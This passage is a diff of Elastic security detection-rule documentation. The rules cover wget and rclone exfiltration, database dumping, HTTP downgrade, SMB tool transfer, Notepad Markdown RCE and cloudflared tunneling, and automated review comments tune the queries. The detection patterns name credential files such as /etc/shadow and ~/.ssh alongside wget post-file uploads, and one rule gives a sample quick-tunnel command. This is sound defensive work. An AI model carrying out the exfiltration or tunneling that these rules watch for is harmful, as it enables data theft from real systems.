to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "wget" and ?process.parent.executable != null and ( + process.args like ("--post-file*", "--post-data*", "--body-file*") or + ( + process.command_line like ("*cat*", "*base64*") and + process.command_line like ( + "*/etc/passwd*", "*/etc/shadow*", "*~/.ssh/*", "*.env*", "*credentials*", "*/tmp/*", + "*/var/tmp/*", "*/dev/shm/*", "*/home/*/*", "*/root/*" + ) + ) +) and +( + process.command_line like ("*http:*", "*https:*") or + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc new file mode 100644 index 0000000000..4d1735290e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc 
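Review bot: In the second branch of the query, `process.command_line like ("*cat*", "*base64*")` is a bare substring match, so `cat` inside `application`, `catalog`, `certificate` or `locate` satisfies it; combined with the equally broad path list (`*/tmp/*`, `*/home/*/*`, `*/root/*`) and the `http:`/`https:` requirement, an ordinary download such as a URL containing "application" saved with `-O` into a home directory meets every condition of that branch, and the false positive analysis above does not mention this download-to-home pattern. Since the branch is meant to catch a sensitive file being read into the request, anchoring the match on a token boundary (for example `"* cat *"` / `"*base64 *"`) or requiring one of the `--post-*`/`--body-file*` arguments alongside it would remove that noise without losing the intended case; which form fits best depends on how your sources populate `process.command_line`. The first branch (`--post-file*`, `--post-data*`, `--body-file*`) is what the description and guide actually describe and is fine as written.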
@@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone]] +=== Potential Data Exfiltration via Rclone + +Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1048/ +* https://rclone.org/commands/rclone_copy/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Exfiltration +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Data Exfiltration via Rclone* + + +Rclone is a legitimate file synchronization tool. Threat actors abuse it (often renamed, e.g. to TrendFileSecurityCheck.exe) to exfiltrate data to S3, HTTP endpoints, or other cloud backends, using `copy`/`sync` with `--include` filters and high `--transfers` to move specific file types at scale. 
+ + +*Possible investigation steps* + + +- Confirm the command line for `copy`/`sync`, cloud backend (e.g. `:s3:`, `:http`), and options like `--include`, `--transfers`, `-P`. +- If the process name is not `rclone.exe`, compare with `process.pe.original_file_name`; a mismatch indicates a renamed copy used to evade name-based detection. +- From the command line, identify the source path (e.g. UNC or local) and the remote backend (S3 bucket, HTTP endpoint) as the exfil destination. +- Review `--include`/`--exclude` and `--max-age`/`--max-size` to understand what data was targeted (documents, CAD, archives, etc.). +- Correlate with the process executable path (recently dropped?), parent process, and user; look for outbound network to the same backend. + + +*False positive analysis* + + +- Legitimate backup or sync jobs using rclone from a known path and config may trigger; allowlist by process path or `--config` path for approved rclone usage. + + +*Response and remediation* + + +- Terminate the rclone process and isolate the host if exfiltration is confirmed. +- Identify and revoke access to the destination (S3 bucket, API keys, etc.); preserve logs for the exfil session. +- Determine scope of data exposed and notify stakeholders; rotate credentials and secrets that may have been in exfiltrated paths. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "rclone.exe" or ?process.pe.original_file_name == "rclone.exe") and process.args : ("copy", "sync") and + not process.args : ("--config=?:\\Program Files\\rclone\\config\\rclone\\rclone.conf", "--config=?:\\Program Files (x86)\\rclone\\config\\rclone\\rclone.conf") and + not process.executable : ("?:\\Program Files*", "\\Device\\HarddiskVolume*\\Program Files*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc new file mode 100644 index 0000000000..0ec78d65d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc 
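Review bot: The final exclusion, `not process.executable : ("?:\\Program Files*", "\\Device\\HarddiskVolume*\\Program Files*")`, exempts every executable anywhere under Program Files, while the description and guide are built on the premise that the binary is renamed to look like a vendor utility; a renamed copy placed in a vendor-looking folder under Program Files satisfies the exclusion and is never evaluated against the `original_file_name` check, which is the very control meant to catch the rename. Narrowing it to the documented install location, e.g. `not process.executable : ("?:\\Program Files\\rclone\\*", "?:\\Program Files (x86)\\rclone\\*")`, keeps the benign packaged install out of scope (matching the two `--config` exclusions, which are already that specific) while leaving the renamed-binary case in. Separately, `process.args : ("copy", "sync")` omits `move`, `moveto` and `copyto`, which transfer data the same way; if they are added, the investigation step that says "Confirm the command line for `copy`/`sync`" should list them too. Note also that `?process.pe.original_file_name == "rclone.exe"` is a case-sensitive comparison whereas the `process.name :` match is not, so a differently cased resource value would be missed; `:` on both would be consistent.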
@@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-18-potential-database-dumping-activity]] +=== Potential Database Dumping Activity + +This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Database Dumping Activity* + + +This alert flags a Linux process starting a common database export tool, which matters because these utilities can quickly copy entire datasets into portable files for theft. An attacker with shell access may run mysqldump, pg_dump, or mongodump to dump customer records or application data to disk and then transfer the archive off the host over a separate network channel. 
+ + +*Possible investigation steps* + + +- Review the full command line, parent and ancestor process chain, and execution user to determine whether the dump was launched by approved backup automation, an administrator shell, or an unexpected process such as a web server or scripting interpreter. +- Validate whether the account and host normally perform database backups by comparing the activity with change windows, cron or systemd timer jobs, deployment scripts, and historical executions on this and similar systems. +- Identify any dump artifacts created around the alert by looking for new large files, archive or compression activity, staging in temporary directories, or writes to mounted shares that could indicate preparation for transfer. +- Examine surrounding authentication and network activity for signs of compromise or exfiltration, including recent SSH or VPN access to the host, unusual database logins, and outbound connections or file transfers shortly after the dump began. +- If the activity is not authorized, isolate the host as appropriate and scope for related activity across the environment by searching for the same user, parent process, command pattern, and follow-on transfer utilities on other systems. + + +*False positive analysis* + + +- Scheduled backup or maintenance scripts may legitimately run pg_dump, mysqldump, or mongodump on Linux database hosts; confirm the execution user, parent process, and timing match documented cron or systemd jobs and that the output is written to the expected backup location. +- A DBA or application administrator may manually export data for migration, troubleshooting, or upgrade validation; verify the user account, shell history or change records, and command-line options align with an approved maintenance task and that no unusual outbound transfer follows the dump. 
+ + +*Response and remediation* + + +- Quarantine the affected Linux host from the network except for approved management access, stop any active pg_dump, mysqldump, mariadb-dump, pg_dumpall, or mongodump activity and any follow-on compression or transfer processes, and block the account and destination used to stage the dump. +- Remove attacker persistence by deleting unauthorized cron jobs, systemd services or timers, startup scripts, SSH authorized_keys entries, web shells, and any scripts or binaries used to create, archive, or move the database export. +- Revoke and rotate the database credentials, local passwords, SSH keys, and API tokens exposed on the host, then review database users for newly granted backup, export, replication, or superuser privileges and disable anything not explicitly approved. +- Restore to a known-good state by rebuilding the host or reverting from a trusted image, validating the database against clean backups, and deleting dump files, archives, and copied datasets from temporary directories, mounted shares, and storage buckets. +- Escalate to incident response immediately if any dump file was transferred to an external server, cloud service, or user workstation, if similar dumping activity is found on other hosts, or if the attacker used a privileged administrator or database account. +- Harden the environment by limiting dump utilities to approved backup hosts and service accounts, enforcing MFA and least privilege for administrators, restricting outbound network paths from database servers, and alerting on new dump archives or unexpected database export tool execution. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. 
+ + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2") and +process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodump") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc new file mode 100644 index 0000000000..88c6db4ca5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc 
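Review bot: The query keys on `process.name` alone, so invocations that export nothing, such as `pg_dump --version` or `mysqldump --help` run by package scripts, configuration management or monitoring checks, raise the same alert as a real dump, and neither the false positive analysis nor the remediation text above accounts for them. A small argument filter, `and not process.args in ("--version", "--help")`, removes that class without touching genuine exports and is cheap to document in the false positive section as a tuning option. The remediation step naming `pg_dump, mysqldump, mariadb-dump, pg_dumpall, or mongodump` matches the query's list, so the guide and query are otherwise consistent.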
@@ -0,0 +1,113 @@
+[[prebuilt-rule-8-19-18-potential-http-downgrade-attack]]
+=== Potential HTTP Downgrade Attack
+
+Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions.
+
+*Rule type*: new_terms
+
+*Rule indices*:
+
+* logs-nginx.access-*
+* logs-apache.access-*
+* logs-apache_tomcat.access-*
+* logs-traefik.access-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Web
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Nginx
+* Data Source: Apache
+* Data Source: Apache Tomcat
+* Data Source: Traefik
+* Resources: Investigation Guide
+
+*Version*: 2
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Potential HTTP Downgrade Attack*
+
+
+This detection surfaces HTTP traffic negotiating a protocol version that deviates from your baseline, a sign of downgrade attempts that strip protections and enable evasion or exploit paths in older behaviors.
An attacker deliberately breaks HTTP/2 negotiation so the server falls back to HTTP/1.1, then probes with crafted headers and chunked bodies to attempt request smuggling or cache bypass against web services.
+
+
+*Possible investigation steps*
+
+
+- Correlate with TLS termination or load balancer logs to verify ALPN or Upgrade negotiation (server advertising h2) and whether the same client/IP previously used h2 with the same SNI/Host, distinguishing forced downgrade from capability mismatch.
+- Review the downgraded requests for exploitation indicators such as simultaneous Content-Length and Transfer-Encoding headers, duplicated or mixed-case headers, unusual methods (TRACE or PRI), or inconsistent chunked encoding suggesting smuggling attempts.
+- Examine surrounding response patterns for increased 400/421/426/431/505, backend 5xx, connection resets, or latency spikes that coincide with these requests and indicate error-driven fallback or probing.
+- Check for recent config changes or incidents on CDNs/WAFs/load balancers and web servers (e.g., http2 enablement, ALPN lists, h2/h2c settings) that could have disabled HTTP/2 and caused benign fallbacks.
+- Cluster events by source IP/User-Agent/ASN and targeted host to identify campaign activity across services and pivot the sources through threat intelligence or reputation feeds.
+
+
+*False positive analysis*
+
+
+- Recent Nginx/Apache/Tomcat configuration changes that disable HTTP/2/h2c or alter TLS/ALPN on specific virtual hosts can legitimately force clients to fall back to HTTP/1.1, surfacing as a downgrade event in access logs.
+- Newly onboarded internal services or scripts that only support HTTP/1.0/1.1 and begin hitting an endpoint for the first time can introduce a first-seen older http.version relative to an HTTP/2 baseline without malicious intent.
+
+
+*Response and remediation*
+
+
+- Immediately block or challenge source IPs/ASNs repeatedly forcing HTTP/1.1 to hosts that previously negotiated HTTP/2 via ALPN, and enable WAF rules to drop “Upgrade: h2c” attempts, requests with both Content-Length and Transfer-Encoding, or duplicated/mixed-case headers.
+- Remove downgrade paths by requiring TLS+ALPN “h2” on 443 (e.g., Nginx listen 443 ssl http2; Apache Protocols h2 http/1.1), disabling cleartext h2c and HTTP/1.0 on public endpoints, and ensuring intermediaries do not strip ALPN or rewrite headers.
+- Redeploy corrected configs and validate end-to-end HTTP/2 with curl --http2 and browser devtools, then confirm normal 2xx/3xx rates and elimination of 421/426/431/505 responses and backend 5xx spikes around previously downgraded traffic.
+- Escalate to Incident Response if downgraded requests show smuggling patterns (simultaneous Content-Length and Transfer-Encoding, mixed-case duplicates, TRACE/PRI methods), hit sensitive paths (/admin, /login, /actuator), or trigger cache anomalies like cross-user content.
+- Harden parsing and caching by normalizing headers at the edge, enforcing a single Content-Length, disabling TRACE, setting strict client_header_buffer_size and large_client_header_buffers, and configuring proxies/backends to reject conflicting CL/TE or ambiguous chunked bodies.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+http.version:*
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Downgrade Attack
+** ID: T1562.010
+** Reference URL: https://attack.mitre.org/techniques/T1562/010/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc
new file mode 100644
index 0000000000..43cbe95b95
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc
@@ -0,0 +1,134 @@
+[[prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share]]
+=== Potential Lateral Tool Transfer via SMB Share
+
+Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-endpoint.events.file-*
+* logs-endpoint.events.network-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper
+* https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Lateral Movement
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+
+*Version*: 112
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Potential Lateral Tool Transfer via SMB Share*
+
+
+Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines.
+
+
+*Possible investigation steps*
+
+
+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Identify the user account that performed the action and whether it should perform this kind of action.
+- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve the created file and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=30s + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and + network.direction : ("incoming", "ingress") and + network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" + ] by process.entity_id + /* add more executable / script extensions here if they are not noisy in your environment */ + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and user.id like ("S-1-5-21*", "S-1-12-*") and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "cpl"))] by process.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc new file mode 100644 index 0000000000..e5e6343b69 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc 
@@ -0,0 +1,118 @@
+[[prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation]]
+=== Potential Notepad Markdown RCE Exploitation
+
+Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-windows.sysmon_operational-*
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Execution
+* Data Source: Elastic Endgame
+* Data Source: Elastic Defend
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Resources: Investigation Guide
+
+*Version*: 2
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Potential Notepad Markdown RCE Exploitation*
+
+
+This rule detects a new child process launched by `notepad.exe` when Notepad was opened with a Markdown (`.md`) file.
+This behavior can indicate exploitation of a Notepad remote code execution vulnerability where crafted Markdown content
+triggers unintended process execution.
+
+
+*Possible investigation steps*
+
+
+- Validate the parent-child relationship and confirm `notepad.exe` is the direct parent of the suspicious process.
+- Review the full command line of both parent and child processes, including the Markdown file path in `process.parent.args`.
+- Identify the Markdown file source (email attachment, browser download, chat client, removable media, or network share).
+- Inspect process ancestry and descendants for additional payload execution, script interpreters, or LOLBIN activity.
+- Correlate with file, registry, and network events around the same timestamp to identify follow-on behavior.
+- Determine whether the child process and its execution path are expected in your environment.
+
+
+*False positive analysis*
+
+
+- Legitimate automation or editor extensions may occasionally spawn helper processes from Notepad workflows.
+- User-driven workflows that invoke external tools from Markdown previews can trigger this behavior.
+- If benign, tune by excluding known-safe child process names, hashes, signed binaries, and approved file paths.
+
+
+*Response and remediation*
+
+
+- Isolate affected endpoints until scope is understood.
+- Terminate suspicious child and descendant processes initiated from `notepad.exe`.
+- Quarantine and preserve the triggering Markdown file for forensic analysis.
+- Run endpoint malware scans and collect volatile artifacts (running processes, network connections, autoruns).
+- Patch Windows/Notepad to the latest security update level addressing the vulnerability.
+- Hunt for the same parent-child pattern across other hosts to identify additional impacted systems.
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "notepad.exe" and process.parent.args : "*.md" and + not process.executable : "C:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_*\\Notepad\\Notepad.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc new file mode 100644 index 0000000000..17b2312992 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc 
@@ -0,0 +1,114 @@
+[[prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared]]
+=== Potential Protocol Tunneling via Cloudflared
+
+Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-system.security*
+* logs-windows.sysmon_operational-*
+* winlogbeat-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://developers.cloudflare.com/cloudflare-one/connections/connect-apps/install-and-setup/tunnel-useful-commands/
+* https://attack.mitre.org/techniques/T1572/
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Command and Control
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Crowdstrike
+* Data Source: Elastic Endgame
+* Data Source: Windows Security Event Logs
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Potential Protocol Tunneling via Cloudflared*
+
+
+Cloudflare Tunnel (cloudflared) is a legitimate tool for exposing local services through Cloudflare's edge. Adversaries abuse it to create quick or named tunnels for C2, data exfiltration, or ingress tool transfer while evading direct connection blocking.
+ + +*Possible investigation steps* + + +- Confirm the process command line for `tunnel`, `--url`, or `tunnel run` to validate cloudflared tunnel usage. +- Identify the parent process and process executable path; cloudflared run from temp or user writable locations is more suspicious than from Program Files. +- For quick tunnel (`--url http://...`), identify the local URL and whether it could be a C2 callback or proxy. +- Correlate with network data for outbound connections to Cloudflare IPs or trycloudflare.com-style hostnames around the same time. +- Review the user and session that started the tunnel; look for other suspicious logon or execution from the same context. + + +*False positive analysis* + + +- Legitimate use of Cloudflare Tunnel for development or internal services may trigger this rule; consider allowlisting by path or user for approved use cases. + + +*Response and remediation* + + +- If unauthorized tunnel use is confirmed: isolate the host, terminate the cloudflared process, and block cloudflared or Cloudflare tunnel domains at DNS/firewall where policy permits. +- Rotate credentials for any accounts that may have been exposed over the tunnel. + + +==== Rule query + + 